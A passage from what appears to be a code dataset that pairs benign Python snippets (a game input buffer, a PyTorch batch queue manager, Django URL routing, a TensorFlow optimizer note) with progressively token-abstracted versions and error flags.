self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n <function token>\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n <function token>\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n <function token>\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n <function token>\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n <function token>\n\n def clear(self):\n self._inputs.clear()\n <function token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def clear(self):\n self._inputs.clear()\n <function token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n <function token>\n\n def __str__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def clear(self):\n self._inputs.clear()\n <function token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n <function token>\n\n def __str__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n <function token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n <function token>\n <function token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n<class token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n<class token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n <function token>\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n<class token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n <function token>\n <function token>\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n<class token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n <function token>\n <function token>\n <function token>\n", "<import token>\n<class token>\n<class token>\n<class token>\n" ]
false
68
b693cc63e2ee4c994ef7b5e44faea99f15a021f6
import torch import torch.multiprocessing as mp import random class QManeger(object): def __init__(self, opt, q_trace, q_batch): self.traces_s = [] self.traces_a = [] self.traces_r = [] self.lock = mp.Lock() self.q_trace = q_trace self.q_batch = q_batch self.opt = opt self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu") def _push_one(self, state, action, reward): self.traces_s.append(state) self.traces_a.append(action) self.traces_r.append(reward) def listening(self): while True: traces = self.q_trace.get(block=True) for s, a, r in zip(traces[0], traces[1], traces[2]): self._push_one(s, a, r) if len(self.traces_s) > self.opt.batch_size: self.produce_batch() def produce_batch(self): batch_size = self.opt.batch_size res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:batch_size], \ self.traces_r[:batch_size] # delete del self.traces_s[:batch_size] del self.traces_a[:batch_size] del self.traces_r[:batch_size] res_s = torch.FloatTensor(res_s).to(self.device) res_a = torch.LongTensor(res_a).to(self.device) res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1) # stack batch and put self.q_batch.put((res_s, res_a, res_r))
[ "import torch\nimport torch.multiprocessing as mp\nimport random\n\nclass QManeger(object):\n\n def __init__(self, opt, q_trace, q_batch):\n self.traces_s = []\n self.traces_a = []\n self.traces_r = []\n self.lock = mp.Lock()\n\n self.q_trace = q_trace\n self.q_batch = q_batch\n self.opt = opt\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n def _push_one(self, state, action, reward):\n self.traces_s.append(state)\n self.traces_a.append(action)\n self.traces_r.append(reward)\n\n def listening(self):\n while True:\n traces = self.q_trace.get(block=True)\n for s, a, r in zip(traces[0], traces[1], traces[2]):\n self._push_one(s, a, r)\n\n if len(self.traces_s) > self.opt.batch_size:\n self.produce_batch()\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:batch_size], \\\n self.traces_r[:batch_size]\n\n # delete\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n\n # stack batch and put\n self.q_batch.put((res_s, res_a, res_r))\n", "import torch\nimport torch.multiprocessing as mp\nimport random\n\n\nclass QManeger(object):\n\n def __init__(self, opt, q_trace, q_batch):\n self.traces_s = []\n self.traces_a = []\n self.traces_r = []\n self.lock = mp.Lock()\n self.q_trace = q_trace\n self.q_batch = q_batch\n self.opt = opt\n self.device = torch.device('cuda' if torch.cuda.is_available() else\n 'cpu')\n\n def _push_one(self, state, action, reward):\n self.traces_s.append(state)\n self.traces_a.append(action)\n self.traces_r.append(reward)\n\n def listening(self):\n while True:\n traces = self.q_trace.get(block=True)\n for s, a, r in zip(traces[0], traces[1], traces[2]):\n self._push_one(s, a, r)\n if len(self.traces_s) > self.opt.batch_size:\n self.produce_batch()\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:\n batch_size], self.traces_r[:batch_size]\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n self.q_batch.put((res_s, res_a, res_r))\n", "<import token>\n\n\nclass QManeger(object):\n\n def __init__(self, opt, q_trace, q_batch):\n self.traces_s = []\n self.traces_a = []\n self.traces_r = []\n self.lock = mp.Lock()\n self.q_trace = q_trace\n self.q_batch = q_batch\n self.opt = opt\n self.device = torch.device('cuda' if torch.cuda.is_available() else\n 'cpu')\n\n def _push_one(self, state, action, reward):\n self.traces_s.append(state)\n self.traces_a.append(action)\n self.traces_r.append(reward)\n\n def listening(self):\n while True:\n traces = self.q_trace.get(block=True)\n for s, a, r in zip(traces[0], traces[1], traces[2]):\n self._push_one(s, a, r)\n if len(self.traces_s) > self.opt.batch_size:\n self.produce_batch()\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:\n batch_size], self.traces_r[:batch_size]\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n self.q_batch.put((res_s, res_a, res_r))\n", "<import token>\n\n\nclass QManeger(object):\n <function token>\n\n def _push_one(self, state, action, reward):\n self.traces_s.append(state)\n self.traces_a.append(action)\n self.traces_r.append(reward)\n\n def listening(self):\n while True:\n traces = self.q_trace.get(block=True)\n for s, a, r in zip(traces[0], traces[1], traces[2]):\n self._push_one(s, a, r)\n if len(self.traces_s) > self.opt.batch_size:\n self.produce_batch()\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:\n batch_size], self.traces_r[:batch_size]\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n self.q_batch.put((res_s, res_a, res_r))\n", "<import token>\n\n\nclass QManeger(object):\n <function token>\n <function token>\n\n def listening(self):\n while True:\n traces = self.q_trace.get(block=True)\n for s, a, r in zip(traces[0], traces[1], traces[2]):\n self._push_one(s, a, r)\n if len(self.traces_s) > self.opt.batch_size:\n self.produce_batch()\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:\n batch_size], self.traces_r[:batch_size]\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n self.q_batch.put((res_s, res_a, res_r))\n", "<import token>\n\n\nclass QManeger(object):\n <function token>\n <function token>\n <function token>\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:\n batch_size], self.traces_r[:batch_size]\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n self.q_batch.put((res_s, res_a, res_r))\n", "<import token>\n\n\nclass QManeger(object):\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<class token>\n" ]
false
69
3c0beb7be29953ca2d7b390627305f4541b56efa
import sys sys.path.append("../circos_report/cnv_anno2conf") from cnv_anno2conf import main_cnv tarfile = {"yaml": "data/test_app.yaml"} def test_main_cnv(): main_cnv(tarfile) if __name__ == "__main__": test_main_cnv()
[ "import sys\nsys.path.append(\"../circos_report/cnv_anno2conf\")\nfrom cnv_anno2conf import main_cnv\n\n\ntarfile = {\"yaml\": \"data/test_app.yaml\"}\n\ndef test_main_cnv():\n main_cnv(tarfile)\n\nif __name__ == \"__main__\":\n test_main_cnv()\n\n", "import sys\nsys.path.append('../circos_report/cnv_anno2conf')\nfrom cnv_anno2conf import main_cnv\ntarfile = {'yaml': 'data/test_app.yaml'}\n\n\ndef test_main_cnv():\n main_cnv(tarfile)\n\n\nif __name__ == '__main__':\n test_main_cnv()\n", "<import token>\nsys.path.append('../circos_report/cnv_anno2conf')\n<import token>\ntarfile = {'yaml': 'data/test_app.yaml'}\n\n\ndef test_main_cnv():\n main_cnv(tarfile)\n\n\nif __name__ == '__main__':\n test_main_cnv()\n", "<import token>\nsys.path.append('../circos_report/cnv_anno2conf')\n<import token>\n<assignment token>\n\n\ndef test_main_cnv():\n main_cnv(tarfile)\n\n\nif __name__ == '__main__':\n test_main_cnv()\n", "<import token>\n<code token>\n<import token>\n<assignment token>\n\n\ndef test_main_cnv():\n main_cnv(tarfile)\n\n\n<code token>\n", "<import token>\n<code token>\n<import token>\n<assignment token>\n<function token>\n<code token>\n" ]
false
70
8d0fcf0bf5effec9aa04e7cd56b4b7098c6713cb
for i in range(-10,0): print(i,end=" ")
[ "for i in range(-10,0):\n print(i,end=\" \")", "for i in range(-10, 0):\n print(i, end=' ')\n", "<code token>\n" ]
false
71
a14114f9bb677601e6d75a72b84ec128fc9bbe61
from django.contrib import admin from django.urls import path, include, re_path from django.conf.urls import include # from rest_framework import routers from rest_framework.authtoken import views # from adventure.api import PlayerViewSet, RoomViewSet # from adventure.api import move # router = routers.DefaultRouter() # router.register('rooms', RoomViewSet) # router.register('currentRoom', PlayerViewSet) urlpatterns = [ path('admin/', admin.site.urls), path('api/', include('api.urls')), path('api/adv/', include('adventure.urls')), # path('api-token-auth', views.obtain_auth_token) ]
[ "from django.contrib import admin\nfrom django.urls import path, include, re_path\nfrom django.conf.urls import include\n# from rest_framework import routers\nfrom rest_framework.authtoken import views\n# from adventure.api import PlayerViewSet, RoomViewSet\n\n\n\n# from adventure.api import move\n\n# router = routers.DefaultRouter()\n# router.register('rooms', RoomViewSet)\n# router.register('currentRoom', PlayerViewSet)\n\n\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include('api.urls')),\n path('api/adv/', include('adventure.urls')),\n # path('api-token-auth', views.obtain_auth_token)\n]\n", "from django.contrib import admin\nfrom django.urls import path, include, re_path\nfrom django.conf.urls import include\nfrom rest_framework.authtoken import views\nurlpatterns = [path('admin/', admin.site.urls), path('api/', include(\n 'api.urls')), path('api/adv/', include('adventure.urls'))]\n", "<import token>\nurlpatterns = [path('admin/', admin.site.urls), path('api/', include(\n 'api.urls')), path('api/adv/', include('adventure.urls'))]\n", "<import token>\n<assignment token>\n" ]
false
72
edb206a8cd5bc48e831142d5632fd7eb90abd209
import tensorflow as tf optimizer = tf.train.GradientDescentOptimizer(0.001).minimize(loss) _, l = sess.run([optimizer, loss], feed_dict={X:x, Y:y}) Session looks at all trainable variables that loss depends on and update them tf.Variable(initializer=None, trainable=True, collections=None, validate_shape=True, caching_device=None, name=None, variable_def=None, dtype=None, expected_shape=None, import_scope=None) List of optimizers in TF 1. tf.train.GradientDescentOptimizer 2. tf.train.AdagradOptimizer 3. tf.train.MomentumOptimizer 4. tf.train.AdamOptimizer 5. tf.train.ProximalGradientDescentOptimizer 6. tf.train.ProximalAdagradOptimizer 7. tf.train.RMSPropOptimizer And more
[ "import tensorflow as tf\noptimizer = tf.train.GradientDescentOptimizer(0.001).minimize(loss)\n_, l = sess.run([optimizer, loss], feed_dict={X:x, Y:y})\n\nSession looks at all trainable variables that loss depends on and update them\ntf.Variable(initializer=None, trainable=True, collections=None, validate_shape=True, caching_device=None,\n name=None, variable_def=None, dtype=None, expected_shape=None, import_scope=None)\n\nList of optimizers in TF\n1. tf.train.GradientDescentOptimizer\n2. tf.train.AdagradOptimizer\n3. tf.train.MomentumOptimizer\n4. tf.train.AdamOptimizer\n5. tf.train.ProximalGradientDescentOptimizer\n6. tf.train.ProximalAdagradOptimizer\n7. tf.train.RMSPropOptimizer\nAnd more" ]
true
73
